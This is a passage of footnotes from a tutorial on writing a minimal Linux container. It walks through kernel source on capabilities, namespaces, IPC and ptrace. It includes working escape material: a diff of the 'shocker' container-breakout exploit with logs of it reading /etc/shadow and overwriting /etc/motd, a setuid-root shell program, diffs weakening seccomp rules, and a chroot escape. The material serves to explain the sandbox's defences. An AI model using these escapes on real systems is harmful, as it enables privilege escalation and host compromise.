> 	if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_WRONLY)) < 0)
178,180c177,179
< 	memset(buf, 0, sizeof(buf));
< 	if (read(fd2, buf, sizeof(buf) - 1) < 0)
< 		die("[-] read");
---
> 	if (write(fd2, new_motd, sizeof(new_motd)) != sizeof(new_motd))
> 		die("[-] write");
> 
182c181
< 	fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
---
> 	fprintf(stderr, "[!] Win! /etc/motd written.\n");

Listing 84: allow_capdacreadsearch.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..c0cabcc 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -33,7 +33,6 @@ int capabilities()
 		CAP_AUDIT_READ,
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
-		CAP_DAC_READ_SEARCH,
 		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,

[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capdacreadsearch -m . -u 0 -c ./shocker_write
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.axVxAE...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]
[*] Resolving 'etc/motd'
[*] Found .
[*] Found ..
[*] Found lib64
[*] Found sys
[*] Found run
[*] Found sbin
[*] Found opt
[*] Found tmp
[*] Found lost+found
[*] Found dev
[*] Found mnt
[*] Found root
[*] Found lib
[*] Found boot
[*] Found home
[*] Found usr
[*] Found bin
[*] Found srv
[*] Found etc
[+] Match: etc ino=4325377
[*] Brute forcing remaining 32bit. This can take a while...
[*] (etc) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x01, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'motd'
[*] Found binfmt.d
[*] Found ts.conf
[*] Found nscd.conf
[*] Found dhcpcd.duid
[*] Found sensors3.conf
[*] Found libao.conf
[*] Found .
[*] Found motd
[+] Match: motd ino=4325389
[*] Brute forcing remaining 32bit. This can take a while...
[*] (motd) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x0d, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x0d, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/motd written.
=> cleaning cgroups...done.

³⁵

Listing 85: allow_capdacreadsearch.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..c0cabcc 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -33,7 +33,6 @@ int capabilities()
 		CAP_AUDIT_READ,
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
-		CAP_DAC_READ_SEARCH,
 		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,

Listing 86: allow_capdacreadsearch.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..c0cabcc 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -33,7 +33,6 @@ int capabilities()
 		CAP_AUDIT_READ,
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
-		CAP_DAC_READ_SEARCH,
 		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,

[lizzie@empress l-c-i-500-l]$sudo ./contained -m . -u 0 -c ./shocker
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.bWoGr4...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[-] open_by_handle_at: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capdacreadsearch -m . -u 0 -c ./shocker
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.Jto0pj...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[*] Found .
[*] Found ..
[*] Found lib64
[*] Found sys
[*] Found run
[*] Found sbin
[*] Found opt
[*] Found tmp
[*] Found lost+found
[*] Found dev
[*] Found mnt
[*] Found root
[*] Found lib
[*] Found boot
[*] Found home
[*] Found usr
[*] Found bin
[*] Found srv
[*] Found etc
[+] Match: etc ino=4325377
[*] Brute forcing remaining 32bit. This can take a while...
[*] (etc) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x01, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'shadow'
[*] Found binfmt.d
[*] Found ts.conf
[*] Found nscd.conf
[*] Found dhcpcd.duid
[*] Found sensors3.conf
[*] Found libao.conf
[*] Found .
[*] Found motd
[*] Found gdb
[*] Found ..
[*] Found qemu
[*] Found lirc
[*] Found healthd.conf
[*] Found subuid
[*] Found locale.gen.pacnew
[*] Found gtk-3.0
[*] Found idn.conf
[*] Found wgetrc
[*] Found mime.types
[*] Found texmf
[*] Found request-key.conf
[*] Found xinetd.d
[*] Found ssl
[*] Found ifplugd
[*] Found mpd.conf
[*] Found gimp
[*] Found logrotate.d
[*] Found dhcpcd.conf
[*] Found trusted-key.key
[*] Found resolv.conf
[*] Found gemrc
[*] Found libpaper.d
[*] Found hostname
[*] Found kernel
[*] Found audit
[*] Found request-key.d
[*] Found subgid
[*] Found services
[*] Found protocols
[*] Found profile.d
[*] Found Muttrc.dist
[*] Found audisp
[*] Found default
[*] Found resolv.conf.bak
[*] Found ufw
[*] Found man_db.conf
[*] Found gconf
[*] Found geoclue
[*] Found netconfig
[*] Found nanorc
[*] Found environment
[*] Found crypttab
[*] Found brltty.conf
[*] Found logrotate.conf
[*] Found goaccess.conf
[*] Found nsswitch.conf
[*] Found shadow
[+] Match: shadow ino=4334485
[*] Brute forcing remaining 32bit. This can take a while...
[*] (shadow) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x95, 0x23, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x95, 0x23, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/shadow output follows:
[redacted]
=> cleaning cgroups...done.

³⁶

Listing 87: fs/namei.c:316@c8d2bc:

int generic_permission(struct inode *inode, int mask)
{
	int ret;

	/*
	 * Do the basic permission checks.
	 */
	ret = acl_permission_check(inode, mask);
	if (ret != -EACCES)
		return ret;

	if (S_ISDIR(inode->i_mode)) {
		/* DACs are overridable for directories */
		if (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE))
			return 0;
		if (!(mask & MAY_WRITE))
			if (capable_wrt_inode_uidgid(inode,
						     CAP_DAC_READ_SEARCH))
				return 0;
		return -EACCES;
	}
	/*
	 * Read/write DACs are always overridable.
	 * Executable DACs are overridable when there is
	 * at least one exec bit set.
	 */
	if (!(mask & MAY_EXEC) || (inode->i_mode & S_IXUGO))
		if (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE))
			return 0;

	/*
	 * Searching includes executable on directories, else just read.
	 */
	mask &= MAY_READ | MAY_WRITE | MAY_EXEC;
	if (mask == MAY_READ)
		if (capable_wrt_inode_uidgid(inode, CAP_DAC_READ_SEARCH))
			return 0;

	return -EACCES;
}

³⁷

man 5 acct gives more useful information about this system than man 2 acct.

³⁸

CAP_IPC_OWNER is only used in ipcperms:

Listing 88: ipc/util.c:468@c8d2bc

/**
 * ipcperms - check ipc permissions
 * @ns: ipc namespace
 * @ipcp: ipc permission set
 * @flag: desired permission set
 *
 * Check user, group, other permissions for access
 * to ipc resources. return 0 if allowed
 *
 * @flag will most probably be 0 or S_...UGO from <linux/stat.h>
 */
int ipcperms(struct ipc_namespace *ns, struct kern_ipc_perm *ipcp, short flag)
{
	kuid_t euid = current_euid();
	int requested_mode, granted_mode;

	audit_ipc_obj(ipcp);
	requested_mode = (flag >> 6) | (flag >> 3) | flag;
	granted_mode = ipcp->mode;
	if (uid_eq(euid, ipcp->cuid) ||
	    uid_eq(euid, ipcp->uid))
		granted_mode >>= 6;
	else if (in_group_p(ipcp->cgid) || in_group_p(ipcp->gid))
		granted_mode >>= 3;
	/* is there some bit set in requested_mode but not in granted_mode? */
	if ((requested_mode & ~granted_mode & 0007) &&
	    !ns_capable(ns->user_ns, CAP_IPC_OWNER))
		return -1;

	return security_ipc_permission(ipcp, flag);
}

It's used in the following places immediately after looking up the IPC object in the IPC namespace:

In the IPC shared memory system ipc/shm.c@c8d2bc (done after shm_obtain_object and shm_obtain_object_check):
- ipc/shm.c:869@c8d2bc: shmctl_nolock
- ipc/shm.c:1081@c8d2bc: do_shmat
In the IPC semaphore system, ipc/sem.c@c8d2bc (done sem_obtain_object and sem_obtain_object_check):
- ipc/sem.c:1200@c8d2bc: semctl_nolock
- ipc/sem.c:1289@c8d2bc: semctl_setval
- ipc/sem.c:1360@c8d2bc: semctl_main
- ipc/sem.c:1816@c8d2bc: semtimedop
In the IPC message queue system, ipc/msg.c@c8d2bc (done after msq_obtain_object and msq_obtain_object_check):
- ipc/msg.c:445@c8d2bc: msgctl_nolock
- ipc/msg.c:630@c8d2bc: do_msgsnd
- ipc/msg.c:846@c8d2bc: do_msgrcv

ipc_check_perms is another a thin layer over it that doesn't check the IPC namespace.

Listing 89: ipc/util.c:290@c8d2bc

/**
 * ipc_check_perms - check security and permissions for an ipc object
 * @ns: ipc namespace
 * @ipcprgre: ipc permission set
 * @ops: the actual security routine to call
 * @params: its parameters
 *
 * This routine is called by sys_msgget(), sys_semget() and sys_shmget()
 * when the key is not IPC_PRIVATE and that key already exists in the
 * ds IDR.
 *
 * On success, the ipc id is returned.
 *
 * It is called with ipc_ids.rwsem and ipcp->lock held.
 */
static int ipc_check_perms(struct ipc_namespace *ns,
			   struct kern_ipc_perm *ipcp,
			   const struct ipc_ops *ops,
			   struct ipc_params *params)
{
	int err;

	if (ipcperms(ns, ipcp, params->flg))
		err = -EACCES;
	else {
		err = ops->associate(ipcp, params->flg);
		if (!err)
			err = ipcp->id;
	}

	return err;
}

which is called by ipcget_public.

Listing 90: ipc/util.c:323@c8d2bc

/**
 * ipcget_public - get an ipc object or create a new one
 * @ns: ipc namespace
 * @ids: ipc identifier set
 * @ops: the actual creation routine to call
 * @params: its parameters
 *
 * This routine is called by sys_msgget, sys_semget() and sys_shmget()
 * when the key is not IPC_PRIVATE.
 * It adds a new entry if the key is not found and does some permission
 * / security checkings if the key is found.
 *
 * On success, the ipc id is returned.
 */
static int ipcget_public(struct ipc_namespace *ns, struct ipc_ids *ids,
		const struct ipc_ops *ops, struct ipc_params *params)
{
	struct kern_ipc_perm *ipcp;
	int flg = params->flg;
	int err;

	/*
	 * Take the lock as a writer since we are potentially going to add
	 * a new entry + read locks are not "upgradable"
	 */
	down_write(&ids->rwsem);
	ipcp = ipc_findkey(ids, params->key);
	if (ipcp == NULL) {
		/* key not used */
		if (!(flg & IPC_CREAT))
			err = -ENOENT;
		else
			err = ops->getnew(ns, params);
	} else {
		/* ipc object has been locked by ipc_findkey() */

		if (flg & IPC_CREAT && flg & IPC_EXCL)
			err = -EEXIST;
		else {
			err = 0;
			if (ops->more_checks)
				err = ops->more_checks(ipcp, params);
			if (!err)
				/*
				 * ipc_check_perms returns the IPC id on
				 * success
				 */
				err = ipc_check_perms(ns, ipcp, ops, params);
		}
		ipc_unlock(ipcp);
	}
	up_write(&ids->rwsem);

	return err;
}

ipcget_public handles both creation and accessing for non-IPC_PRIVATE requests. It doesn't check IPC namespace for existing IPC objects. It's called by ipc_get if IPC_PRIVATE is not set:

Listing 91: ipc/util.c:625@c8d2bc

/**
 * ipcget - Common sys_*get() code
 * @ns: namespace
 * @ids: ipc identifier set
 * @ops: operations to be called on ipc object creation, permission checks
 *       and further checks
 * @params: the parameters needed by the previous operations.
 *
 * Common routine called by sys_msgget(), sys_semget() and sys_shmget().
 */
int ipcget(struct ipc_namespace *ns, struct ipc_ids *ids,
			const struct ipc_ops *ops, struct ipc_params *params)
{
	if (params->key == IPC_PRIVATE)
		return ipcget_new(ns, ids, ops, params);
	else
		return ipcget_public(ns, ids, ops, params);
}

whcih in turn is called in the following places:

But shmget, semget, and msgget are all part of the System V IPC set, and in order to use them you need to call shmat, semop / semtimedop, and msgsend / msgrcv~, all only work for objects in the namespace:

shmat immediately calls do_shmat, which is listed above;

Listing 92: ipc/shm.c:1249@c8d2bc

SYSCALL_DEFINE3(shmat, int, shmid, char __user *, shmaddr, int, shmflg)
{
	unsigned long ret;
	long err;

	err = do_shmat(shmid, shmaddr, shmflg, &ret, SHMLBA);
	if (err)
		return err;
	force_successful_syscall_return();
	return (long)ret;
}

semop calls semtimedop:

Listing 93: ipc/sem.c:20151@c8d2bc

SYSCALL_DEFINE3(semop, int, semid, struct sembuf __user *, tsops,
		unsigned, nsops)
{
	return sys_semtimedop(semid, tsops, nsops, NULL);
}

Listing 94: ipc/sem.c:1816@c8d2bc

SYSCALL_DEFINE4(semtimedop, int, semid, struct sembuf __user *, tsops,
		unsigned, nsops, const struct timespec __user *, timeout)
{
	/* ... */
	ns = current->nsproxy->ipc_ns;

	/* ...
	   allocate some space for things.
	   ...
	*/

	sma = sem_obtain_object_check(ns, semid);

	/* ... */
}

msgsnd and msgrcv immediately call do_msgsnd and do_msgrcv, which are also listed above:

Listing 95: ipc/msg.c:743@c8d2bc

SYSCALL_DEFINE4(msgsnd, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
		int, msgflg)
{
	long mtype;

	if (get_user(mtype, &msgp->mtype))
		return -EFAULT;
	return do_msgsnd(msqid, mtype, msgp->mtext, msgsz, msgflg);
}

Listing 96: ipc/msg.c:1004@c8d2bc

SYSCALL_DEFINE5(msgrcv, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
		long, msgtyp, int, msgflg)
{
	return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}

³⁹

We can see that they're effectively namespaced:

Listing 97: enumerate_net_devs.c

/* Local Variables: */
/* compile-command: "gcc -Wall -Werror -static enumerate_net_devs.c \*/
/*                   -o enumerate_net_devs" */
/* End: */
#include <stdio.h>
#include <net/if.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>

int main (int argc, char **argv)
{
	int sock = socket(PF_LOCAL, SOCK_SEQPACKET, 0);
	for (size_t i = 0; i < 100; i++) {
		struct ifreq req = { .ifr_ifindex = i };
		if (!ioctl(sock, SIOCGIFNAME, &req))
			printf("%3lu: %s\n", i, req.ifr_name);
	}
	return 0;
}

[lizzie@empress l-c-i-500-l]$sudo ./contained -m . -u 0 -c ./enumerate_net_devs
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.7npCN7...done.
=> trying a user namespace...writing /proc/1750/uid_map...writing
/proc/1750/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.  1: lo
=> cleaning cgroups...done.

⁴⁰

Network device datastructures are created inside of the kernel, not in userspace with mknod.

For example, ip link add dummy0 type dummy does this:

Opens a NETLINK_ROUTE netlink socket.
Sends a RTM_NEWLINK message over it.

Code in net/core/rtnetlink.c@c8d2bc dispatches the message to rtnl_create_link, which does this;

Listing 98: net/core/rtnetlink.c:2239@c8d2bc

struct net_device *rtnl_create_link(struct net *net,
	const char *ifname, unsigned char name_assign_type,
	const struct rtnl_link_ops *ops, struct nlattr *tb[])
{
	int err;
	struct net_device *dev;
	unsigned int num_tx_queues = 1;
	unsigned int num_rx_queues = 1;

	/* ... */

	err = -ENOMEM;
	dev = alloc_netdev_mqs(ops->priv_size, ifname, name_assign_type,
			       ops->setup, num_tx_queues, num_rx_queues);
	if (!dev)
		goto err;

	/* ... */
}

alloc_netdev_mqs calls the setup function:

/**
 *	alloc_netdev_mqs - allocate network device
 *	@sizeof_priv:		size of private data to allocate space for
 *	@name:			device name format string
 *	@name_assign_type:	origin of device name
 *	@setup:			callback to initialize device
 *	@txqs:			the number of TX subqueues to allocate
 *	@rxqs:			the number of RX subqueues to allocate
 *
 *	Allocates a struct net_device with private data area for driver use
 *	and performs basic initialization.  Also allocates subqueue structs
 *	for each queue on the device.
 */
struct net_device *alloc_netdev_mqs(int sizeof_priv, const char *name,
		unsigned char name_assign_type,
		void (*setup)(struct net_device *),
		unsigned int txqs, unsigned int rxqs)
{
	struct net_device *dev;
	size_t alloc_size;
	struct net_device *p;

	/* ... */

	setup(dev);

	/* ... */
}

dummy_setup gets called, since it's the .setup of a rtnl_link_ops:

Listing 100: drivers/net/dummy.c:170@c8d2bc

static struct rtnl_link_ops dummy_link_ops __read_mostly = {
	.kind		= DRV_NAME,
	.setup		= dummy_setup,
	.validate	= dummy_validate,
};

Listing 101: drivers/net/dummy.c:137@c8d2bc

static void dummy_setup(struct net_device *dev)
{
	ether_setup(dev);

	/* Initialize the device structure. */
	dev->netdev_ops = &dummy_netdev_ops;
	dev->ethtool_ops = &dummy_ethtool_ops;
	dev->destructor = free_netdev;

	/* Fill in device structure with ethernet-generic values. */
	dev->flags |= IFF_NOARP;
	dev->flags &= ~IFF_MULTICAST;
	dev->priv_flags |= IFF_LIVE_ADDR_CHANGE | IFF_NO_QUEUE;
	dev->features	|= NETIF_F_SG | NETIF_F_FRAGLIST;
	dev->features	|= NETIF_F_ALL_TSO | NETIF_F_UFO;
	dev->features	|= NETIF_F_HW_CSUM | NETIF_F_HIGHDMA | NETIF_F_LLTX;
	dev->features	|= NETIF_F_GSO_ENCAP_ALL;
	dev->hw_features |= dev->features;
	dev->hw_enc_features |= dev->features;
	eth_hw_addr_random(dev);
}

In other words, there's no equivalent of userspace major / minor device numbers for network devices.

⁴¹

Listing 102: kernel/ptrace.c:1079@c8d2bc:

SYSCALL_DEFINE4(ptrace, long, request, long, pid, unsigned long, addr,
		unsigned long, data)
{
	struct task_struct *child;
	long ret;

	if (request == PTRACE_TRACEME) {
		ret = ptrace_traceme();
		if (!ret)
			arch_ptrace_attach(current);
		goto out;
	}

	child = ptrace_get_task_struct(pid);
	if (IS_ERR(child)) {
		ret = PTR_ERR(child);
		goto out;
	}
	[...]
}

which calls ptrace_get_task_struct:

Listing 103: kernel/ptrace.c:1060@c8d2bc:

static struct task_struct *ptrace_get_task_struct(pid_t pid)
{
	struct task_struct *child;

	rcu_read_lock();
	child = find_task_by_vpid(pid);
	if (child)
		get_task_struct(child);
	rcu_read_unlock();

	if (!child)
		return ERR_PTR(-ESRCH);
	return child;
}

…which in turn calls find_task_by_vpid

Listing 104: kernel/pid.c:459@c8d2bc:

struct task_struct *find_task_by_vpid(pid_t vnr)
{
	return find_task_by_pid_ns(vnr, task_active_pid_ns(current));
}

which calls find_task_by_pid_ns:

Listing 105: kernel/pid.c:452@c8d2bc:

struct task_struct *find_task_by_pid_ns(pid_t nr, struct pid_namespace *ns)
{
	RCU_LOCKDEP_WARN(!rcu_read_lock_held(),
			 "find_task_by_pid_ns() needs rcu_read_lock() protection");
	return pid_task(find_pid_ns(nr, ns), PIDTYPE_PID);
}

which, finally, calls find_pid_ns. You can see here that it only finds a stuct pid * that shares the pid namespace of the current task.

Listing 106: kernel/pid.c:366@c8d2bc:

struct pid *find_pid_ns(int nr, struct pid_namespace *ns)
{
	struct upid *pnr;

	hlist_for_each_entry_rcu(pnr,
			&pid_hash[pid_hashfn(nr, ns)], pid_chain)
		if (pnr->nr == nr && pnr->ns == ns)
			return container_of(pnr, struct pid,
					numbers[ns->level]);

	return NULL;
}

⁴²

The kill syscalls call kill_something_info, which follows a dense call chain ( kill_pid_info -> group_send_sig_info -> do_send_sig_info -> send_sig_info -> send_signal -> __send_signal) to eventually end up in __send_signal, which does respect user namespaces:

Listing 107: kernel/signal.c:972@c8d2bc

static int __send_signal(int sig, struct siginfo *info, struct task_struct *t,
			int group, int from_ancestor_ns)
{
	/* ... */
	q = __sigqueue_alloc(sig, t, GFP_ATOMIC | __GFP_NOTRACK_FALSE_POSITIVE,
		override_rlimit);
	if (q) {
		list_add_tail(&q->list, &pending->list);
		switch ((unsigned long) info) {
		case (unsigned long) SEND_SIG_NOINFO:
			q->info.si_signo = sig;
			q->info.si_errno = 0;
			q->info.si_code = SI_USER;
			q->info.si_pid = task_tgid_nr_ns(current,
							task_active_pid_ns(t));
			q->info.si_uid = from_kuid_munged(current_user_ns(), current_uid());
			break;
		case (unsigned long) SEND_SIG_PRIV:
			q->info.si_signo = sig;
			q->info.si_errno = 0;
			q->info.si_code = SI_KERNEL;
			q->info.si_pid = 0;
			q->info.si_uid = 0;
			break;
		default:
			copy_siginfo(&q->info, info);
			if (from_ancestor_ns)
				q->info.si_pid = 0;
			break;
		}

		userns_fixup_signal_uid(&q->info, t);
	}
	/*...*/
}

⁴³

Quoted man 7 capabilities, again:

	CAP_SETGID
		Make  arbitrary  manipulations   of  process  GIDs  and
		supplementary GID  list; forge GID when  passing socket
		credentials via  UNIX domain sockets; write  a group ID
		mapping in a user namespace (see user_namespaces(7)).
	CAP_SETUID
		Make   arbitrary   manipulations    of   process   UIDs
		(setuid(2),  setreuid(2),  setresuid(2),  setfsuid(2));
		forge  UID when  passing  socket  credentials via  UNIX
		domain  sockets; write  a  user ID  mapping  in a  user
		namespace (see user_namespaces(7)).

⁴⁴

Brad Spengler's "False Boundaries and Arbitrary Code Execution", again

CAP_SYS_CHROOT: generic: From Julien Tinnes/Chris Evans: if you have write access to the same filesystem as a suid root binary, set up a chroot environment with a backdoored libc and then execute a hardlinked suid root binary within your chroot and gain full root privileges through your backdoor

⁴⁵

man 2 chroot:

This call does not change the current working directory, so that after the call '.' can be outside the tree rooted at '/'. In particular, the superuser can escape from a "chroot jail" by doing:
mkdir foo; chroot foo; cd ..

⁴⁶

There have been issues with unpacking containers in Docker and LXC:

Listing 110: Docker 1.3.2 - Security Advisory {24 Nov 2014}

=====================================================
[CVE-2014-6407] Archive extraction allowing host privilege escalation
=====================================================
Severity: Critical
Affects: Docker up to 1.3.1

The Docker engine, up to and including version 1.3.1, was vulnerable to
extracting files to arbitrary paths on the host during ‘docker pull’ and
‘docker load’ operations. This was caused by symlink and hardlink
traversals present in Docker's image extraction. This vulnerability could
be leveraged to perform remote code execution and privilege escalation.

Listing 111: Docker 1.6.1 - Security Advisory {150507}

====================================================================

[CVE-2015-3629] Symlink traversal on container respawn allows local
privilege escalation

====================================================================

Libcontainer version 1.6.0 introduced changes which facilitated a mount
namespace breakout upon respawn of a container. This allowed malicious
images to write files to the host system and escape containerization.

Listing 112: Security issues in LXC (CVE-2015-1331 and CVE-2015-1334), from Tyler Hicks

* Roman Fiedler discovered a directory traversal flaw that allows
  arbitrary file creation as the root user. A local attacker must set up
  a symlink at /run/lock/lxc/var/lib/lxc/<CONTAINER>, prior to an admin
  ever creating an LXC container on the system. If an admin then creates
  a container with a name matching <CONTAINER>, the symlink will be
  followed and LXC will create an empty file at the symlink's target as
  the root user.
  - CVE-2015-1331
  - Affects LXC 1.0.0 and higher
  - https://launchpad.net/bugs/1470842
  - https://github.com/lxc/lxc/commit/72cf81f6a3404e35028567db2c99a90406e9c6e6 (master)
  - https://github.com/lxc/lxc/commit/61ecf69d7834921cc078e14d1b36c459ad8f91c7 (stable-1.1)
  - https://github.com/lxc/lxc/commit/f547349ea7ef3a6eae6965a95cb5986cd921bd99 (stable-1.0)

* Roman Fiedler discovered a flaw that allows processes intended to be
  run inside of confined LXC containers to escape their AppArmor or
  SELinux confinement. A malicious container can create a fake proc
  filesystem, possibly by mounting tmpfs on top of the container's
  /proc, and wait for a lxc-attach to be ran from the host environment.
  lxc-attach incorrectly trusts the container's
  /proc/PID/attr/{current,exec} files to set up the AppArmor profile and
  SELinux domain transitions which may result in no confinement being
  used.
  - CVE-2015-1334
  - Affects LXC 0.9.0 and higher
  - https://launchpad.net/bugs/1475050
  - https://github.com/lxc/lxc/commit/5c3fcae78b63ac9dd56e36075903921bd9461f9e (master)
  - https://github.com/lxc/lxc/commit/659e807c8dd1525a5c94bdecc47599079fad8407 (stable-1.1)
  - https://github.com/lxc/lxc/commit/15ec0fd9d490dd5c8a153401360233c6ee947c24 (stable-1.0)

Tyler

These are all really interesting! I want to write more about them.

⁴⁷

The Docker seccomp policy doesn't include an explicit blacklist, which makes it a little hard to follow, so I wrote code to find it.

    #!/usr/bin/env python3

    import gzip
    import requests
    import re
    import sys

    url = "https://raw.githubusercontent.com/docker/docker/5ff21add06ce0e502b41a194077daad311901996/profiles/seccomp/default.json"

    conditional = set()
    allowed = set()
    disallowed = set()

    for entry in requests.get(url).json()["syscalls"]:
        if entry["args"]:
           conditional |= set(entry["names"])
        else:
            allowed |= set(entry["names"])

    manpage = "/usr/share/man/man2/syscalls.2.gz"

    with gzip.open(manpage, "r") as f:
        ready = False
        for _line in f:
            line = _line.decode("utf-8")
            # table end
            if ready and line == ".TE\n":
                break
            match = re.match(r"\\fB(.+?)\\fP(.+)", line)
            if match:
                if match.group(1) == "System call":
                    ready = True
                elif (match.group(1) not in allowed
                      and match.group(1) not in conditional):
                    disallowed.add(match.group(1))

    print("Conditionally allowed:")
    for c in sorted(conditional):
        sys.stdout.write("~%s~, " % c)
    print("\n\nDisallowed:")
    for d in sorted(disallowed):
        sys.stdout.write("~%s~, " % d)
    sys.stdout.write("\n")

Conditionally allowed: clone, personality,

Disallowed: _sysctl, add_key, alloc_hugepages, bdflush, clock_adjtime, clock_settime, create_module, free_hugepages, get_kernel_syms, get_mempolicy, getpagesize, kern_features, kexec_file_load, kexec_load, keyctl, mbind, migrate_pages, move_pages, nfsservctl, nice, oldfstat, oldlstat, oldolduname, oldstat, olduname, pciconfig_iobase, pciconfig_read, pciconfig_write, perfctr, perfmonctl, pivot_root, ppc_rtas, preadv2, pwritev2, quotactl, readdir, request_key, set_mempolicy, setup, sgetmask, sigaction, signal, sigpending, sigprocmask, sigsuspend, spu_create, spu_run, ssetmask, subpage_prot, swapoff, swapon, sync_file_range2, sysfs, uselib, userfaultfd, ustat, utrap_install, vm86, vm86old

⁴⁸

Listing 114: self_setuid.c

/* -*- compile-command: "gcc -Wall -Werror -static self_setuid.c -o self_setuid" -*- */
#define _GNU_SOURCE
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

int main (int argc, char **argv)
{
	if (argc == 2 && !strcmp(argv[1], "shell")) {
		if (setresuid(0, 0, 0)) {
			fprintf(stderr, "++ setresuid(0, 0, 0) failed: %m\n");
			return 1;
		}
		return system("sh");
	} else {
		if (chown(argv[0], 0, 0)) {
			fprintf(stderr, "++ chown failed: %m\n");
			return 1;
		}
		int self_fd = 0;
		if (!(self_fd = open(argv[0], 0))) {
			fprintf(stderr, "++ fopen failed: %m\n");
			return 1;
		}
		if (chmod(argv[0], S_ISUID | S_IXOTH)
		    && fchmod(self_fd, S_ISUID | S_IXOTH)
		    && fchmodat(AT_FDCWD, argv[0], S_ISUID | S_IXOTH, 0)) {
			fprintf(stderr, "++ chmod  / fchmod / fchmodat failed: %m\n");
			close(self_fd);
			return 1;
		}
		close(self_fd);
		return 0;
	}
}

Listing 115: allow_chmod.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..b471a69 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -151,18 +151,6 @@ int syscalls()
 	scmp_filter_ctx ctx = NULL;
 	fprintf(stderr, "=> filtering syscalls...");
 	if (!(ctx = seccomp_init(SCMP_ACT_ALLOW))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
